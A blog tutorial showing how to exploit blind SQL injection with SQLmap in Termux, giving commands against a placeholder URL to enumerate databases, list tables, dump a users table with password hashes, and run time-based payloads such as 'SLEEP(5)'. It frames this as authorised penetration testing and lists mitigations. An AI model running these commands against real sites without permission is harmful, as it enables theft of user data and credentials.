Exploit Blind SQL Injection with SQLmap in Termux

Posted on by Sam Galope
Exploit Blind SQL Injection with SQLmap in Termux
Exploit Blind SQL Injection with SQLmap in Termux

Blind SQL injection is a stealthy yet dangerous web application vulnerability that attackers use to manipulate SQL queries. Unlike traditional SQL injection, where errors or data are directly visible, blind SQL injection forces hackers to exploit the vulnerability by carefully observing the behavior of the system, such as delays or specific responses.

In this guide, you will learn how to exploit blind SQL injection vulnerabilities using SQLmap within Termux. SQLmap is a powerful open-source penetration testing tool designed to automate the detection and exploitation of SQL injection flaws. We’ll provide clear examples, including sample outputs for each command, so you can develop the skills to assess web application security and protect against potential threats.

Table of Contents

Prerequisites

Before proceeding, ensure you have:

  • An Android device with Termux installed.
  • Basic knowledge of SQL and web application structure.
  • Permission to test any web application you attempt to exploit.

Step 1: Install Termux and Update Packages

Start by installing Termux from the Google Play Store or F-Droid. Once installed, open Termux and update your package list:

pkg update && pkg upgrade

Sample Output:

Hit:1 https://packages.termux.dev/apt/termux-main stable InRelease
Reading package lists... Done
All packages are up to date.

Step 2: Install SQLmap

Next, clone the SQLmap repository using Git to install it on your device:

pkg install git  
git clone https://github.com/sqlmapproject/sqlmap.git  
cd sqlmap

Sample Output:

Cloning into 'sqlmap'...
remote: Enumerating objects: 45348, done.
remote: Counting objects: 100% (45348/45348), done.
remote: Compressing objects: 100% (18676/18676), done.
Receiving objects: 100% (45348/45348), 7.69 MiB | 2.51 MiB/s, done.
Resolving deltas: 100% (30789/30789), done.

Step 3: Identify a Vulnerable Target

Before you can exploit blind SQL injection, you need a target web application. You can set up a test environment using vulnerable applications like DVWA (Damn Vulnerable Web Application) or bWAPP.

Always ensure you have permission to test a web application to comply with legal and ethical guidelines.

Step 4: Test the Target with SQLmap

Once you identify a potential target URL, use SQLmap to probe for vulnerabilities:

python sqlmap.py -u "http://target.com/vulnerable-page?id=1" --dbs

Explanation:

  • -u: Specifies the URL of the target.
  • --dbs: Tells SQLmap to enumerate databases if the target is vulnerable.

Sample Output:

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE or HAVING clause
    Payload: id=1 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END))
---
[INFO] the back-end DBMS is MySQL
available databases:
[*] information_schema
[*] example_db
[*] mysql
[*] performance_schema

Step 5: Exploit Blind SQL Injection to List Tables

Once you’ve found a vulnerable database, you can further exploit blind SQL injection to list its tables:

python sqlmap.py -u "http://target.com/vulnerable-page?id=1" -D example_db --tables

Explanation:

  • -D example_db: Specifies the database you want to explore.
  • --tables: Tells SQLmap to list the tables in the selected database.

Sample Output:

Database: example_db
[1] users
[2] orders
[3] products

Step 6: Extract Data from a Table

Now, let’s retrieve data from a specific table, such as users. Use the following command:

python sqlmap.py -u "http://target.com/vulnerable-page?id=1" -D example_db -T users --dump

Explanation:

  • -T users: Specifies the table to dump data from.
  • --dump: Instructs SQLmap to extract the data.

Sample Output:

id    username    password
1     admin       5f4dcc3b5aa765d61d8327deb882cf99
2     user1       6dcd4ce23d88e2ee9568ba546c007c63

Step 7: Use Delays to Handle Blind SQL Injection

Blind SQL injection often requires time-based attacks where you introduce delays to measure responses. Here’s how you can execute a delay-based attack:

python sqlmap.py -u "http://target.com/vulnerable-page?id=1" --time-sec=5 --dbs

Explanation:

  • --time-sec=5: Introduces a 5-second delay to detect the injection point.

Sample Output:

Parameter: id (GET)
Type: time-based blind
Payload: id=1 AND SLEEP(5)

Step 8: Mitigate the Risks

It’s essential to remember that exploiting blind SQL injection for unauthorized purposes is illegal. Always report vulnerabilities to the site owner and encourage them to fix the issue. Blind SQL injection vulnerabilities can be mitigated through:

  • Parameterized queries.
  • Input validation and sanitization.
  • Using web application firewalls (WAFs).

Conclusion

In this guide, we covered how to exploit blind SQL injection vulnerabilities using SQLmap in Termux. Blind SQL injection is challenging but exploitable with the right tools and techniques. By using SQLmap, you can efficiently identify, test, and exploit these vulnerabilities, allowing you to assess and strengthen the security of web applications.

Always remember to use your skills ethically and responsibly to make the web a safer place.

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *